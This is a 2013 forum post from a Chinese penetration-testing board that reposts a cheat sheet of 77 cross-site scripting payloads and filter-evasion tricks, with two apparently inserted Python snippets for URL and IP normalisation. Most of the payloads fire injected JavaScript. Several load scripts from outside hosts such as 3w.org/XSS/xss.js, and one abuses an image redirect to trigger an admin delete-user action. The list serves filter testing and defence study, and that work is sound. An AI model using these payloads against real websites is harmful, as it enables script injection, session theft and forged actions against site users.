中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title:
XSS Attack Summary
Author:
admin
Date:
2013-4-19 19:22
There seems to be little XSS material on t00ls, so I copied this good stuff over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the "javascript" keyword
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the "javascript" keyword
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all parts must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
2/6

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
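Items 4 through 19 all defeat the same thing: a filter that looks for the literal string "javascript:" in an attribute value. The Python check below is an added example (not from the original post or the cheat sheet it copies) that shows the naive substring test next to a normalisation step that does what the browser does before reading the scheme: decode HTML character references, drop control characters and case-fold. The function names, the allowlist and the sample values are my own assumptions.

```python
import html
import re
from typing import Optional

# Assumption: values are raw attribute text, as received before the browser decodes them.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# The URL parser removes tab/newline/CR anywhere in a URL and trims leading/trailing
# C0 controls and spaces; legacy engines also ignored NUL bytes (items 17-18).
# A filter should be conservative and strip the whole 0x00-0x20 range.
_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

def naive_is_blocked(value: str) -> bool:
    """The kind of filter these payloads defeat: a literal substring match."""
    return "javascript:" in value

def browser_scheme(value: str) -> Optional[str]:
    """Scheme the browser will actually act on, or None for a relative URL.
    Decodes character references (items 5, 7-10), drops embedded controls
    (items 11-14, 17-19) and lower-cases (item 4) before reading the scheme."""
    decoded = html.unescape(value)
    cleaned = _CONTROL_OR_SPACE.sub("", decoded)
    match = _SCHEME.match(cleaned)
    return match.group(1).lower() if match else None

def is_safe_url(value: str) -> bool:
    """Allowlist check: relative URLs and ALLOWED_SCHEMES only, everything else rejected."""
    scheme = browser_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES

# Constructed attribute values mirroring items 4, 5, 11, 17 and 19 above.
SAMPLES = {
    "mixed case": "JaVaScRiPt:alert('XSS')",
    "entity encoded": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "embedded tab": "jav\tascript:alert('XSS')",
    "null byte": "java\x00script:alert('XSS')",
    "leading controls": "\x0e javascript:alert('XSS')",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:18} naive_blocked={str(naive_is_blocked(value)):5} "
              f"scheme={browser_scheme(value)} safe={is_safe_url(value)}")
```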
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
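Items 70 through 76 write the same host in spellings that a string-based URL allowlist will not recognise. The Python helper below is an added example, not part of the original post or the cheat sheet it copies: it canonicalises an IPv4 host literal the way the WHATWG URL parser does (decimal, per-label hex and octal, short forms, trailing dot) so that an allowlist compares addresses rather than spellings. `canonical_ipv4` and `same_host` are names I chose, and the host strings in the demo are constructed.

```python
from typing import Optional

def _ipv4_number(part: str) -> int:
    """One dotted label in the spellings the URL parser accepts: 0x-prefixed
    hex (item 71), leading-zero octal (item 72), otherwise decimal (item 70)."""
    if not part.isalnum():
        raise ValueError(part)  # empty, signed or punctuated: not a number
    if part[:2].lower() == "0x":
        return int(part[2:], 16) if len(part) > 2 else 0
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-decimal form of an IPv4 host literal, following the WHATWG IPv4
    parser; None when the host is not an IPv4 literal (i.e. a domain name).
    Assumption: `host` is the bare host component, already split off the URL."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()  # a trailing dot is permitted, as in item 76
    if not 1 <= len(parts) <= 4:
        return None
    try:
        numbers = [_ipv4_number(p) for p in parts]
    except ValueError:
        return None  # a non-numeric label means this is a domain name
    # Every number but the last is one octet; the last fills the remaining bytes.
    if any(n > 255 for n in numbers[:-1]) or numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def same_host(a: str, b: str) -> bool:
    """Comparison an allowlist should use: numeric hosts are canonicalised,
    names are compared case-insensitively with any trailing dot removed."""
    ca, cb = canonical_ipv4(a), canonical_ipv4(b)
    if ca is not None or cb is not None:
        return ca == cb
    return a.lower().rstrip(".") == b.lower().rstrip(".")

if __name__ == "__main__":
    # Constructed host strings: the decimal, hex, octal and mixed spellings of items 70-73.
    for spelling in ("3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001", "66.000146.0x7.147"):
        print(f"{spelling:22} -> {canonical_ipv4(spelling)}")
```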
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source:
http://fuzzexp.org/u/0day/?p=14

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2